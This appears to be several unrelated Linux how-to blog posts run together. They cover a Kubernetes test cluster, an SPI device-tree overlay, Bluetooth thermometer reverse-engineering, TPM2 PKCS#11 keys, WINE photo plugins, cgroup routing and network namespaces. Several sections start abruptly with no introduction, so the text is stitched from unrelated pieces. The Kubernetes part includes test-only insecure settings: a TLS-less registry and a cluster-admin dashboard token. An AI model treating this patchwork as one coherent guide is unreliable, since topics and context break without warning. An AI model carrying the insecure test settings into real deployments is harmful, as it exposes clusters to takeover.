You can find everything you need to deploy your Kubernetes cluster in a VirtualBox in the kubeplay repository. Current pinned version of the components are:

• Base system: Ubuntu LTS Focal 20.04
• Kubernetes: 1.20.5
• CRI-O: 1.20
• Cilium: 1.9.5

The Vagrant configuration to setup a Kubernetes cluster is in the directory cluster. It uses CRI-O as a container runtime. It uses public networking, so be careful if you are not on a trusted network. You can define the network interface to bridge, the number of nodes and their IPs at the beginning of the file. In the repository version:

• Nodes will use interface enp0s25 (default for Ubuntu).

• The master has IP 192.168.0.50

• There will be 4 workers, from 192.168.0.51 to 192.168.0.54. This is the minimum number for running conformance tests.

• Each node will have 2G of RAM.

• The cluster will look for a TLS-less registry on 192.168.0.4. This is not a good idea for exposed networks, however here this is just a testing cluster running inside a single machine.

You need first to up the master:

vagrant up master

because it creates some files that are needed for the nodes. It also leaves the configuration file admin.conf you need to reference from kubectl on the host (please note that kubectl on the host is not installed by this script). If you don’t have other clusters, you can just copy it as the global config:

cp admin.conf $HOME/.kube/config

Networking

Kube-Router

For pod networking, kube-router works out of the box:

kubectl apply -f https://raw.githubusercontent.com/cloudnativelabs/kube-router/master/daemonset/kubeadm-kuberouter.yaml

It is useful to login into the kube-router pod for debugging:

KR_POD=$(basename $(kubectl -n kube-system get pods -l k8s-app=kube-router --output name|head -n1))
kubectl -n kube-system exec -it ${KR_POD} bash

Cilium

Cilium can be quickly installed via helm, which is available also for Arch Linux. It should be installed on the machine where you are going to run kubectl. Here also the stable repository is added:

helm repo add stable https://charts.helm.sh/stable
helm repo add cilium https://helm.cilium.io/
helm repo update

then you can install Cilium with:

helm install cilium cilium/cilium --version 1.9.5 \
   --namespace kube-system \
   --set nodeinit.enabled=true \
   --set kubeProxyReplacement=partial \
   --set hostServices.enabled=false \
   --set externalIPs.enabled=true \
   --set nodePort.enabled=true \
   --set hostPort.enabled=true \
   --set bpf.masquerade=false \
   --set image.pullPolicy=IfNotPresent \
   --set ipam.mode=kubernetes

You should that cilium pods are up (there is enough one cilium-operator pod till there are any more workers) and coredns is not pending:

$ kubectl -n kube-system get pods
cilium-node-init-q9l2m             1/1     Running   0          2m15s
cilium-operator-654456485c-bp9gw   1/1     Running   0          2m15s
cilium-operator-654456485c-wn5sd   0/1     Pending   0          2m15s
cilium-xz8fl                       1/1     Running   0          2m15s
coredns-74ff55c5b-klgjk            1/1     Running   0          4m30s
coredns-74ff55c5b-l6jtq            1/1     Running   0          4m30s
...

Worker Nodes

Afterwards, you can spawn the worker nodes:

vagrant up node1
vagrant up node2
vagrant up node3
vagrant up node4

Testing

You can use sonobuoy to test the cluster for conformance:

sonobuoy run --wait --mode=certified-conformance
results=$(sonobuoy retrieve)
sonobuoy results $results
sonobuoy delete --wait

You should get something like:

Plugin: e2e
Status: passed
Total: 5667
Passed: 311
Failed: 0
Skipped: 5356

Plugin: systemd-logs
Status: passed
Total: 5
Passed: 5
Failed: 0
Skipped: 0

You can also test Cilium:

kubectl create ns cilium-test
kubectl apply -n cilium-test -f https://raw.githubusercontent.com/cilium/cilium/v1.9/examples/kubernetes/connectivity-check/connectivity-check.yaml
kubectl get pods -n cilium-test

check livelness of pods, afterwards you can just delete everything in the namespace:

kubectl -n cilium-test delete all --all --wait

Dashboard

A good way to view cluster status is using k9s. Otherwise, it is possible to install the Kubernetes dashboard and access it via a Kubernetes proxy:

kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.0.0/aio/deploy/recommended.yaml
kubectl proxy

You can access the dashboard at the URL http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/, however you need to use a bearer token to authenticate. You need to create a service account named admin-user and bind it to the role cluster-admin which was created by kubeadm during cluster creation:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin-user
  namespace: kubernetes-dashboard
EOF
cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: admin-user
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: admin-user
  namespace: kubernetes-dashboard
EOF

You can get the bearer token (to be entered in the UI for the proxy above) with:

kubectl -n kubernetes-dashboard get secret $(kubectl -n kubernetes-dashboard get sa/admin-user -o jsonpath="{.secrets[0].name}") -o go-template="{{.data.token | base64decode}}"

Examples

In the examples directory you find various configuration files to start playing with the cluster. You can deploy them using kubectl apply -f. busybox.yaml and busybox-daemon.yaml start a busybox container as a single pod or a daemon set (one pod per node). You can connect to it with:

BB_POD=$(basename $(kubectl get pods -l app=busybox1 --output name|head -n1))
kubectl exec -it ${BB_POD} sh

Another example is a deployment of nginx. It consist of 3 configuration files.

• nginx-deployment.yaml actually defines 2 pods running nginx, with a label my-nginx.

• nginx-service.yaml defines a service which makes the previous deployment available internally to the cluster (and discoverable via Core DNS). For example, you can log to the busybox pod and access it:

  $ kubectl exec -it ${BB_POD} sh
  # wget -O- my-nginx
  Connecting to my-nginx (10.106.35.192:80)
  writing to stdout
  
  <html>
  <head>
  <title>Welcome to nginx!</title>
  ...
  

• nginx-service-nodeport.yaml is the simplest way to make the service externally available. It gets assigned to a port on the public IP address of the nodes. The main problem is that you have to preallocate ports in the range 30000 to 32768.

  $ wget -O- http://192.168.0.50:30080/ –2021-04-04 17:32:39– http://192.168.0.50:30080/ Connecting to 192.168.0.50:30080… connected. HTTP request sent, awaiting response… 200 OK …

Deploying a custom application

As a pre-work, you might need unprivileged user namespaces. For Arch Linux, you just need to follow the instructions on the Buildah page. If you not, you will get error messages related to /etc/subuid and /etc/subgid. This allows unprivileged containers, which is a pretty cool development.

You need a local registry on 192.168.0.4 (configured above), and the custom images will be stored in store /mnt/scratch/registry. Podman in Arch Linux already has a bunch of upstream registries configured, I used the image from docker.io/library/registry:2.

podman run -d --name registry -p 5000:5000 -v /mnt/scratch/registry:/mnt/scratch/registry --restart=always registry:2

You can verify it is running using podman ps.

All the code to be used next is in the custom_app directory. You can run the, well commented, build_and_push.sh to build a statically linked Go Hello World! server, create a container using buildah and push it to the local registry:

./build_and_push.sh

To test locally, you will need to add the IP address and port for the local, TLS-less, registry in the [registries.insecure] stanza of /etc/containers/registries.conf (and restart podman of course). You can start it with:

podman run -d --name my-hello -p 8080:8080  --restart=always my-hello:latest

and check it running with podman ps and connecting to http://localhost:8080/.

Finally, your application can be deployed to the kubeplay cluster (via a nodeport, so you can try it by connecting to the address of a node):

kubectl apply -f my-hello-deployment-nodeport.yaml

You can verify it working by connecting to port 30080 on any node.

dtc -@ -Hepapr -I dts -O dtb -o spidev.dto spidev.dts

The content of spidev.dts is:

/dts-v1/;
/plugin/;

/{
        compatible = "brcm,bcm2835";
        fragment@0 {
                target-path = "/soc/gpio@7e200000";
                __overlay__ {
                        spi0_pins: spi0_pins {
                                brcm,pins = <0x09 0x0a 0x0b>;
                                brcm,function = <0x04>;
                                phandle = <0x0d>;
                        };

                        spi0_cs_pins: spi0_cs_pins {
                                brcm,pins = <0x08 0x07>;
                                brcm,function = <0x01>;
                                phandle = <0x0e>;
                        };
        };
    };
        fragment@1 {
                target-path = "/soc/spi@7e204000";
                __overlay__ {
             pinctrl-names = "default";
             pinctrl-0 = <&spi0_pins &spi0_cs_pins>;
             cs-gpios = <&gpio 8 1>, <&gpio 7 1>;
             status = "okay";

             spidev0: spidev@0{
                 compatible = "lwn,bk4";
                 reg = <0>;      /* CE0 */
                 #address-cells = <1>;
                 #size-cells = <0>;
                 spi-max-frequency = <125000000>;
             };

             spidev1: spidev@1{
                 compatible = "lwn,bk4";
                 reg = <1>;      /* CE1 */
                 #address-cells = <1>;
                 #size-cells = <0>;
                 spi-max-frequency = <125000000>;
             };
                };
        };
};

The next step is to change the u-boot boot script to load the overlay. This is distribution dependent, for Arch Liunx Arm it is /boot/boot.txt. The added lines are marked by a comment. Don’t forget to copy spidev.dto to /boot/dtbs/ and to run ./mkscr.

# After modifying, run ./mkscr

# Set root partition to the second partition of boot device
part uuid ${devtype} ${devnum}:2 uuid

setenv bootargs console=ttyS1,115200 console=tty0 root=PARTUUID=${uuid} rw rootwait smsc95xx.macaddr="${usbethaddr}"

if load ${devtype} ${devnum}:${bootpart} ${kernel_addr_r} /Image; then
  if load ${devtype} ${devnum}:${bootpart} ${fdt_addr_r} /dtbs/${fdtfile}; then
    # Needed for DT Overlay
    fdt addr ${fdt_addr_r}
    fdt resize
    setexpr fdtovaddr ${fdt_addr_r} + F000
    load ${devtype} ${devnum}:${bootpart} ${fdtovaddr} /dtbs/spidev.dto && fdt apply ${fdtovaddr}
    # End of DT Overlay
    if load ${devtype} ${devnum}:${bootpart} ${ramdisk_addr_r} /initramfs-linux.img; then
      booti ${kernel_addr_r} ${ramdisk_addr_r}:${filesize} ${fdt_addr_r};
    else
      booti ${kernel_addr_r} - ${fdt_addr_r};
    fi;
  fi;
fi

Last step, force load spidev.ko by creating /etc/modules-load.d/spidev.conf:

# For the PI hats
spidev

And you should be all set!

You can download an Android application to get you started and test the device. Next we will see some tools useful to inspect a Bluetooth device. For reference, the MAC address of my device is 70:F1:00:00:0F:7B.

bluetootctl

bluetootctl is a tool to gather the basic information about a Bluetooth LE device. A typical session is:

[bluetooth]# power on
[bluetooth]# scan on
Discovery started
[CHG] Device 70:F1:00:00:0F:7B RSSI: -42
[CHG] Device 70:F1:00:00:0F:7B TxPower: 0
[CHG] Device 70:F1:00:00:0F:7B ManufacturerData Key: 0x0010
[CHG] Device 70:F1:00:00:0F:7B ManufacturerData Value:
  00 00 7b 0f 00 00 f1 70 f1 0b 44 01 a4 03 39 4c  ..{....p..D...9L
  09 00            
[bluetooth]# connect 70:F1:00:00:0F:7B
Attempting to connect to 70:F1:00:00:0F:7B
[CHG] Device 70:F1:00:00:0F:7B Connected: yes
Connection successful
...
[NEW] Characteristic (Handle 0xc0ee)
    /org/bluez/hci0/dev_70_F1_00_00_0F_7B/service001f/char0020
    0000fff5-0000-1000-8000-00805f9b34fb
    Unknown
[NEW] Characteristic (Handle 0xc0ee)
    /org/bluez/hci0/dev_70_F1_00_00_0F_7B/service001f/char0023
    0000fff3-0000-1000-8000-00805f9b34fb
    Unknown
...
[bluetooth]# connect 70:F1:00:00:0F:7B
Attempting to connect to 70:F1:00:00:0F:7B
[CHG] Device 70:F1:00:00:0F:7B Connected: yes
Connection successful
[CHG] Device 70:F1:00:00:0F:7B ServicesResolved: yes
[ThermoBeacon]#

Here I copied:

• the advertising result, which is used for current/maximum/minimum temperature, current humidity and battery level. You can already easily spot the MAC address in the message.

• the 2 GATT characteristics which will be used for the complete dump of the data log.

Inspecting the HCI communication on Android

The answers to this Stack Overflow question describes how it is possible to capture the log of the communications on Android phone. Unfortunately, the linked btsnooz.py utility doesn’t work. It is easy to fix it by looking into the repetition of the length field in the records and the limited number of packet types. I uploaded a fixed version.

The HCI log is very detailed and low level, so a bit difficult to follow. However, it is very useful to guess the right sequence of writes/reads to GATT characteristics.

Decompiling the Android APK

You need to have a rooted phone and download the App APK file. The, you can use jadx or directly the on-line decompiler to do the task. The result is not perfect, because the App is written in Kotlin and jadx has some problems with nested exception. However, also the JVM assembler is pretty easy to follow. The key points are:

• Function onLeScan in CurrentActivity.java to understand the fields in the advertisement.

• File LoggingActivity.java for the whole log dump. This is a bit difficult to follow, because of the callback style: the HCI snoop log was very useful to quickly identify the program flow.

Summary

The end result is the Python program sensor_blue_adv.py which allows you to get the current temperature/humidity or dump the whole data log from you Linux system. You need to have bluez and the Python package dbus-next installed.

This article focuses on enabling the usage of the keys stored in the TPM2 by various tools using the PKCS#11 interface. The module should be configured to allow the access to these keys only after some measurement of the state of the system is done, to guarantee that it was not tampered. This part is outside of the scope of these notes. Here the protections offered to the user are the physical possession and the requirement to enter a PIN.

PKCS#11 exposes N separate slots, each containing a token. We will used a separate slot/token for each application. For the basic support under Arch Linux, the following packages need to be installed: tpm2-abrmd,tpm2-pkcs11, tpm2-tools and tpm2-tss. The latest package also sets up udev rules to allow the abrmd broker daemon to access the device /dev/tpm0. You can test if the TPM2 module is working by printing some random characters by using its random number generator:

$ tpm2_getrandom --hex 16

Note that tpm-pkcs11 needs to save some information on disk, I’ve set the TPM2_PKCS11_STORE environment variable to a suitable directory in my .bashrc file.

SSH in slot 1

Using the TPM2 is pretty straightforward. From here on [PIN] denotes the user PIN. Avoid saving the command lines containing it in the bash history, for example by prepending the line with a space.

$ tpm2_ptool init
action: Created
id: 1
$ tpm2_ptool addtoken --pid=1 --sopin=[PIN] --userpin=[PIN] --label=ssh_token
$ tpm2_ptool addkey --algorithm=rsa2048 --label=ssh_token --key-label=ssh_token --userpin=[PIN]
action: add
private:
CKA_ID: '33333334333132626661393734663161'
public:
CKA_ID: '33333334333132626661393734663161'

To output the public key (to be added to the authorized_keys file on the remote system):

$ ssh-keygen -D /usr/lib/pkcs11/libtpm2_pkcs11.so
ssh-rsa AAAAB3NzaC1yc2EAAAADAQA...

And you can connect to a system by offering the key from the TPM2:

$ ssh -I /usr/lib/pkcs11/libtpm2_pkcs11.so [destination host]

GnuPG in slot 2

Supporting GnuPG is more complicated. You will need openssl for creating a certificate from the public key and the package gnupg-pkcs11-scd to interface GnuPG with the TPM2 via the PKCS#11 API. Unfortunately, there is a bug at the moment in the upstream program which doesn’t correctly inform the GnuPG agent daemon about the key padding. I prepared a Pull Request for the upstream, until it is merged, you need to use the version from my github repository.

The initial part is similar to the previous case, but then you need to create a certificate from the public key to allow GnuPG to use it:

$ tpm2_ptool init
action: Created
id: 2
$ tpm2_ptool addtoken --pid=2 --label=gpg_token --sopin=[PIN] --userpin=[PIN]
$ tpm2_ptool addkey --algorithm=rsa2048 --label=gpg_token --key-label=gpg_token --userpin=[PIN]
$ openssl <<EOF
req -engine pkcs11 -new -key pkcs11:model=rls;manufacturer=Nuvoton;serial=0000000000000000;token=gpg_token;type=private;pin-value=[PIN] -keyform engine -out req.pem -text -x509 -subj /CN=[Your Common Name]
x509 -engine pkcs11 -signkey pkcs11:model=rls;manufacturer=Nuvoton;serial=0000000000000000;token=gpg_token;type=private;pin-value=[PIN] -keyform engine -in req.pem -out cert.pem
EOF
$ tpm2_ptool addcert --label gpg_token --key-label gpg_token cert.pem

Afterwards, we need to configure the SCD (smart card driver) for the GnuPG Agent which uses the PKCS#11 to work with the private key. Unfortunately, GnuPG Agent supports only a single SCD, so you cannot use both the TPM2 and a normal smart card at the same time. Also, note that the patched version of gnupg-pkcs11-scd needs to be used until upstream is fixed. Two configuration files need changes:

• ~/.gnupg/gpg-agent.conf: scdaemon-program /usr/bin/gnupg-pkcs11-scd

• scdaemon-program /usr/bin/gnupg-pkcs11-scd: has_padding providers tpm provider-tpm-library /usr/lib/pkcs11/libtpm2_pkcs11.so

• for the latter, the following debug directives might be useful if you encounter any problems: verbose debug-all log-file /tmp/scd.log

GnuPG Agent has to be restarted and you need to trigger a reload of the smart card:

$ systemctl --user restart gpg-agent.service
$ gpg --card-status

The next step consist in identifying the keygrip for the RSA keypair stored in the TPM2 module. The procedure for creating a keypair should support automatically identifying the smartcard. Unfortunately, this doesn’t seem working, so you need to manually list the available keygrips:

$ gpg-agent --server gpg-connect-agent << EOF
SCD LEARN
EOF
...
gnupg-pkcs11-scd[9221]: S KEY-FRIEDNLY 01B4D88E8F24441E1773472EFAD1CFE020072CF2 /CN=[The CN you used] on gpg_tokenchan_0 ...
...

Look for a 40 characters long string of letters and numbers after the words KEY-FRIENDLY. With this information you can proceed with the normal generation of a keypair using option 13 Existing key and entering the keygrip when prompted:

$ gpg --expert --full-generate-key
...
Please select what kind of key you want:
   (1) RSA and RSA (default)
   (2) DSA and Elgamal
   (3) DSA (sign only)
   (4) RSA (sign only)
   (7) DSA (set your own capabilities)
   (8) RSA (set your own capabilities)
   (9) ECC and ECC
  (10) ECC (sign only)
  (11) ECC (set your own capabilities)
  (13) Existing key
  (14) Existing key from card
Your selection? 13
Enter the keygrip: 01B4D88E8F24441E1773472EFAD1CFE020072CF2
...

And that’s it, you should have a keypair based on the RSA keys in the TPM2. Please test it by encrypting/decrypting/signing some text.

OpenVPN in slot 3

OpenVPN is similar to GPG because it needs a certificate. However, usually an OpenVPN is deployed by defining a custom CA which signs the certificates. The easiest way for doing it is by using EasyRSA. The set up of a CA is outside the scope of this article, there are many good tutorials to get started.

The initial steps are the same as the GPG case:

$ tpm2_ptool init
action: Created
id: 3
$  tpm2_ptool addtoken --pid=3 --label=openvpn_token --sopin=[Your PIN] --userpin=[Your PIN]
$  tpm2_ptool addkey --algorithm=rsa2048 --label=openvpn_token --key-label=openvpn_token --userpin=[Your PIN]
action: add
private:
  CKA_ID: '33313665373362353539386632666162'
public:
  CKA_ID: '33313665373362353539386632666162'

Afterwards, you need to create a Certificate Sign Request with openssl (mind the missing x509 compared to the previous invocation of openssl):

$  openssl req -engine pkcs11 -new -key 'pkcs11:model=rls;manufacturer=Nuvoton;serial=0000000000000000;token=openvpn_token;type=private;pin-value=[Your PIN]' -keyform engine -out req.csr -subj /CN=chri_tpm2_1

Customize the Common Name according to your needs (I used chri_tpm2_1 to identify the client in this case)`. Now you can import and sign the CSR with EasyRSA:

$  easyrsa import-req req.csr chri_tpm_1
$  easyrsa sign-req client chri_tpm_1

and the certificate signed by your OpenVPN deployment’s CA can be imported back into the TPM2:

$ tpm2_ptool addcert --label openvpn_token --key-label openvpn_token pki/issued/chri_tpm_1.crt
action: add
cert:
  CKA_ID: '33313665373362353539386632666162'

You can check with the openvpn command itself that the certificate is visible:

$ openvpn --show-pkcs11-ids /usr/lib/pkcs11/libtpm2_pkcs11.so
Certificate
       DN:             CN=chri_tpm2_1
       Serial:         2C6524CBF1845D6A662A3E40285FCEF5
       Serialized id:  Nuvoton/rls/0000000000000000/openvpn_token/33313665373362353539386632666162

Take note of the Serialized id because it needs to be used in the configuration file for the client. Here is the configuration that I use, chri_tpm_1.conf, as an example (look for the options starting with pkcs11):

dev tun
client
remote [Your OpenVPN server] [Your OpenVPN server port] udp
<ca>
-----BEGIN CERTIFICATE-----
... CA certificate from EasyRSA
-----END CERTIFICATE-----
</ca>
pkcs11-providers /usr/lib/pkcs11/libtpm2_pkcs11.so
pkcs11-id &#039;Nuvoton/rls/0000000000000000/openvpn_token/33313665373362353539386632666162&#039;
nobind
persist-key
persist-tun
remote-cert-tls server
key-direction 1
<tls-auth>
-----BEGIN OpenVPN Static key V1-----
... MAC Static key, recommended but not mandatory
-----END OpenVPN Static key V1-----
</tls-auth>
verb 3

And here you can see an example of a successful connection:

$ openvpn --config chri_tpm_1.conf
...
Mon Jun  1 20:42:22 2020 TLS: Initial packet from [AF_INET][your server IP:port], sid=381bca9d 47aaf107
Mon Jun  1 20:42:22 2020 VERIFY OK: depth=1, CN=[the CA for your openvpn]
Mon Jun  1 20:42:22 2020 VERIFY KU OK
Mon Jun  1 20:42:22 2020 Validating certificate extended key usage
Mon Jun  1 20:42:22 2020 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
Mon Jun  1 20:42:22 2020 VERIFY EKU OK
Mon Jun  1 20:42:22 2020 VERIFY OK: depth=0, CN=server_1
Enter openvpn_token token Password: ****************
Mon Jun  1 20:42:41 2020 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, 2048 bit RSA
Mon Jun  1 20:42:41 2020 [server_1] Peer Connection Initiated with [AF_INET][your server IP:port]
...

Note that you will be asked for the PIN. If you start openvpn via some other tool (systemd-networkd or NetworManager for example), the right way to provide the PIN is via the management interface (look for the management-query-passwords option in the openvpn’s manual page). This function should be provided by the network utility starting openvpn.

Comments

• Torsten on 2022-04-05 19:35:34 +0100
  Hello,
  thanks for helping a lot with your article. I tried to create an openvpn-request, but it failed getting the private key. I ended up creating my own openssl-conf that includes tpm2-pkcs11, and this worked fine.
  Is the parameter “-key” you are using documented somewhere? I may just need different parameters, but have neither found a documentation about it nor could I list these from my tpm system.
  Greetings from Braunschweig,
  Torsten

1. Install WINE of course. I use Arch Linux, which comes with extensive instructions. It really just boils down to pacman -S wine after you have enabled Multilib. An important trick is using Win32 mode which usually works better (I’m running other software, like AutoStakkert, Registax, WinJUPOS and Deep Sky Stacker without troubles in WINE with Win32). The link above goes into the details, basically you have set-up some environment variables before starting the Windows executable (I keep the Windows file system in a directory win32 under my home one):
   export WINEPREFIX=$HOME/win32
   export WINEARCH=win32
   Also I use winecfg to select a Windows 7 personality. Also note at least WINE 1.8 is needed, 1.6 won’t work (thanks to Victor Lavaud who reported this and my wrong usage of auto-quotes).
2. Download the .exe installer and run it under wine, with the current version: wine nikcollection-full-1.2.11.exe. Be aware that there’s a bug (some API not entirely implemented or being confused by the spaces in filenames maybe) that will pop-up a window about the impossibility of writing a file (in the resource directory for each filter). The fix is easy, just create that directory and press the retry button. If you followed my convention about directories, the following commands will do the trick:
   <br /> mkdir -p "$HOME/win32/drive_c/users/Public/Application Data/Google/Analog Efex Pro 2/resource"<br /> mkdir -p "$HOME/win32/drive_c/users/Public/Application Data/Google/Color Efex Pro 4/resource"<br /> mkdir -p "$HOME/win32/drive_c/users/Public/Application Data/Google/Dfine 2/resource"<br /> mkdir -p "$HOME/win32/drive_c/users/Public/Application Data/Google/HDR Efex Pro 2/resource"<br /> mkdir -p "$HOME/win32/drive_c/users/Public/Application Data/Google/Sharpener Pro 3/resource"<br /> mkdir -p "$HOME/win32/drive_c/users/Public/Application Data/Google/Silver Efex Pro 2/resource"<br /> mkdir -p "$HOME/win32/drive_c/users/Public/Application Data/Google/Viveza 2/resource"
   or replace win32 with your wine directory (the default is .wine which I find a bit confusing being normally hidden).
3. You should be able to to use the plug-ins standalone. This makes a lot of sense, for example, for the HDR one: you should feed it the RAW pictures with adequately different exposure times. In this case just run: wine "$HOME/win32/drive_c/Program Files/Google/Nik Collection/HDR Efex Pro 2/HDR Efex Pro 2.exe". On a just partially related note: I’m not sure NEF Nikon RAW files can be opened directly (I tried to install the Microsoft Camera Codec Pack in WINE but no luck) but you can always create a linear 16bpp TIFF from the RAW file using dcraw.
   Anyway it is much simple to just use the filters as plugin for GIMP, so I customized the ShellOut GIMP plugin. Grab the modified version of ShellOut.py and put it into ~/.gimp-2.8/plug-ins. A new menu entry ShellOut… should appear under the Script-Fu menu. When you activate it you should be given the choice of running any of the available plug-ins on the current layer or a copy of it. You should consider 2 customizations to ShellOut.py:
   • The already mentioned top-level WINE directory that might be different than win32.
   • The file you use for the exchange. I use tif because, in the newest, right now still experimental, GIMP 2.9.2 it supports floating point pixel depth (for this version of GIMP the plug-in directory moved to ~/.config/GIMP/2.9/plug-ins). There are 2 caveats: it is a bit slower and you get some annoying error messages about some TIFF flags not being supported. To mitigate the later problem, you can dock an error console, so the messages won’t be impacting. But, if you don’t care about high pixel depth just use png instead of tif: it is pretty faster.

That’s it, enjoy the new photographic tools. Please enable sending feedback information so Google will see there are many Linux users and will consider a native installation and maybe an Open Source release … who knows?

Update: If you experience problems on Ubuntu, you might check out the very interesting Erico’s page.

You can find the source code and the hardware description on github.

You will need a Linux kernel >= 3.14 and a modern iptables. The former is easy to obtain (at least on Debian via back-ported kernels or directly on Jessie), the later is a bit more difficult. Anyway I prepared a compiled binary, just point the IPT variable to it once unpacked in the root directory:

IPT=/mnt/scratch/iptables/sbin/iptables

You have to correctly mount the cgroup file-system, the easiest way on Jessie is by installing the package cgroupfs-mount.

The method will be based on the 3 technologies mentioned in the title:

• the cgroups net_cls controller will be used to set the classid of the packet originated from the process.
• iptables will be used to mark the packet. This is possible thanks to the patch by Daniel Borkmann, see this thread for more information. If the entire patch had been accepted,  we would have used the new proposed controller. But the proliferation of cgroup controllers being a bad thing and the unclear semantics of fwmark (because it would be modifiable both by cgroups and iptables) had as a consequence that only the netfilter part of the patch got in the v3.14 kernel.
• policy routing to define a new routing table wit a different default route that is triggered wit the fwmark.

In my opinion this method has 2 advantage over the one presented in the previous articles:

• it’s much easier to change the default route for processes (even already running) because it’s easier to move a process into or out of a control group.
• you don’t need the bridging thing.

The clear disadvantage is that it’s built on newer technologies not available out of the box on older distributions, like Debian Wheezy for example.

Now let’s see how it works. First define a control group for the net_cls controller:

mkdir /sys/fs/cgroup/net_cls/new_route
cd /sys/fs/cgroup/net_cls/new_route
echo 0x00110011 > net_cls.classid

packet generated by processes in this control group will be annotated with the given 0x00110011 (11:11) classid. Next use iptables to fwmark packets:

$IPT -t mangle -A OUTPUT -m cgroup --cgroup 0x00110011 -j MARK --set-mark 11

note that it’s very important to put the rule in this specific table and chain to trigger rerouting. Check out this picture on wikipedia, it’s worth more that thousand words in describing the journey of a packet in the Linux network stack. Finally we have to declare an additional routing table for policy routing:

echo 11 new_route >> /etc/iproute2/rt_tables # just once!
ip rule add fwmark 11 table new_route
ip route add default via 10.0.10.58 table new_route

here 10.0.10.58 is the default gateway for the processes in the new_route control group. Now it’s really easy to change the default route for a process, just add it to the control group. It’s quite entraintaining to have a ping running and see how RTT changes based on the default gateway. You can find the PID for ping in the usual ways (ps is your best friend), let’s say it’s 2345:

cd /sys/fs/cgroup/net_cls/new_route
echo 2345 > tasks

and you can take it out from the control group easily:

echo 2345 > ../tasks

Keep in mind that when a process in a net_cls control group forks, its child will be in the same one. But if you move the parent, the child will stay there. Normal cgroups semantics applies.

This example gives just another application of the powerful cgroups concept. Others are of course possible, like per-process dynamic firewall rules or traffic control disciplines.

Comments

• Dan on 2014-09-09 06:04:26 +0100

On Debian Jessie I receive this error:

# $IPT -t mangle -A OUTPUT -m cgroup –cgroup 0x00110011 -j MARK –set-mark 11
iptables v1.4.21: Couldn’t load match `cgroup’:No such file or directory

Try `iptables -h’ or ‘iptables –help’ for more information.

# dpkg –list | grep cgroup
ii cgroupfs-mount 1.0 all Light-weight package to set up cgroupfs mounts

• Christian Pellegrin on 2014-09-16 13:11:04 +0100

It looks like the iptables you are using has not cgroup support compiled in. Just try:

/mnt/scratch/iptables/sbin/iptables -m cgroup --help

to check it.

• Kris on 2016-02-28 22:55:27 +0100

Hi,

Regarding “Couldn’t load match `cgroup’:No such file or directory”, compilign latests iptables (using this procedure: http://www.linuxfromscratch.org/blfs/view/cvs/postlfs/iptables.html ) and running this this solved it:
cgroupfs-mount
sudo “$IPT” (yes, run as root)

But I’m facing some issues.
Particularly with VPN, I can’t bypass my VPN inteface tun0 with this technique.
Even with “ip route add … src ” the VPN tunnel is sort of bypassed (packets are send in clear) but they are sent with the tun0 source IP, never with eth0 source IP! So I never get my ping reply.

Not using cgroups and adding static routes to the default table DOES work, but whenever using cgroups with the custom new_route table, everything that goes out from this table uses the VPN tun0 source IP… any clue?

• John on 2016-08-03 22:22:54 +0100

Hi there,

Thanks for taking the time to write this post. It helped me get to my ultimate goal of creating a script for my Debian 8 system to run an app/process under a different networking regime from the rest of the system.

My search led me to this post and also to this superuser page:
http://superuser.com/questions/271915/route-the-traffic-over-specific-interface-for-a-process-in-linux

…and KrisWebDev’s very good bash script to automate the process.

Kris’ script had a use case that didn’t quite fit my needs, so I modified his script quite extensively to make it more generic. I posted a gist of it here in case you find it useful.

https://gist.github.com/level323/54a921216f0baaa163127d960bfebbf0

Cheers

• Fred Scott on 2017-11-18 07:37:19 +0100

Great article.
Works great when the processes are running on a physical linux host.

However, if I have a docker container with 2 processes and want to do per process routing on packets from each process, it seems the classID flags are not set correctly when the packet hits the mangle table. More details on this and a kernel patch to fix this are at https://github.com/moby/moby/issues/19802 and https://lists.linuxfoundation.org/pipermail/containers/2014-January/033848.html respectively.

Has anyone successfully managed to do per process routing on two different processes in a docker container ?

• Alexander Martin on 2019-05-13 23:15:56 +0100

Hey thanks for the script!

It is working, however there appears to be an issue with ipv6. When I visit wtfismyip.com, the ipv4 address is correct, but somehow the ipv6 address of the other network card is being leaked.

My janky solution was to just turn off ipv6, but ideally I would prefer to not do this.

I tried to remedy this by mimicking your script with ip6tables, but unfortunately it seems like ipv6 has a different setup. Would be happy to compensate you for a fix. Hopefully this get to you, if so reach out at alexandermartin006 at that google service everyone uses.

Linux namespaces are a cool feature that permit process groups to have a limited view of system resource. See the superb LWN article for more information. In this article we will use network namespaces which permits different process groups to have a different view of the networking system. Processes in a network namespace cannot see the physical network adapter but only a virtual one. We can create 2 of them as the endpoints of a pipe to make the processes in a network namespace speak with the outer net. For this we will use the simplest approach, a bridge. Other, more complicate, setups like NAT are of course possible.

First of all lets define some convenience variables:

BASE_IP=10.0.10.253
FAST_GW=10.0.10.58
NETMASK=255.255.255.0
SLOW_IP=10.0.10.149
SLOW_GW=10.0.10.57

These define the physical IP address of my machine, the fast connection gateway, the netmask of my setup, the IP that will be seen by processes in the network container and the gatway for the slow network.

Next we have to create the network namespace. Its name is slow for obvious reasons:

ip netns add slow

and the virtual ethernets that act as the endpoints for the pipe from it to the “real world”:

ip link add veth0 type veth peer name veth1
ifconfig veth0 0.0.0.0 up
ip link set veth1 netns slow

we have to unconfigure the physical network card because it will be part of the bridge:

ifdown eth0
ifconfig eth0 0.0.0.0 up

and then we bridge it to one endpoint of the pipe to the network namespace:

brctl addbr br0
brctl addif br0 eth0 veth0

we reassign the base ip to the bridge interface so we can continue working as before for processes not in network namespace:

ifconfig br0 $BASE_IP netmask $NETMASK up
route add default gw $FAST_GW

the configuration of the host is finished, now we have to turn our attention to what happens in the network namespace. To execute a process there we have to use the command ip netns exec [namespace] [command]. Here we setup the IP address of the interface in the namespace and define the default route pointing to the slow gateway:

ip netns exec slow ifconfig veth1 $SLOW_IP netmask $NETMASK up
ip netns exec slow route add default gw $SLOW_GW

and voilà, we can now run our favorite long-running network command in the newly created namespace:

ip netns exec slow aptitude safe-upgrade

we can also start a shell there, so everything we will do there will be routed to the slow gateway. We can also relogin as a non privileged user (ip nets commands need root privileges):

ip netns exec slow bash
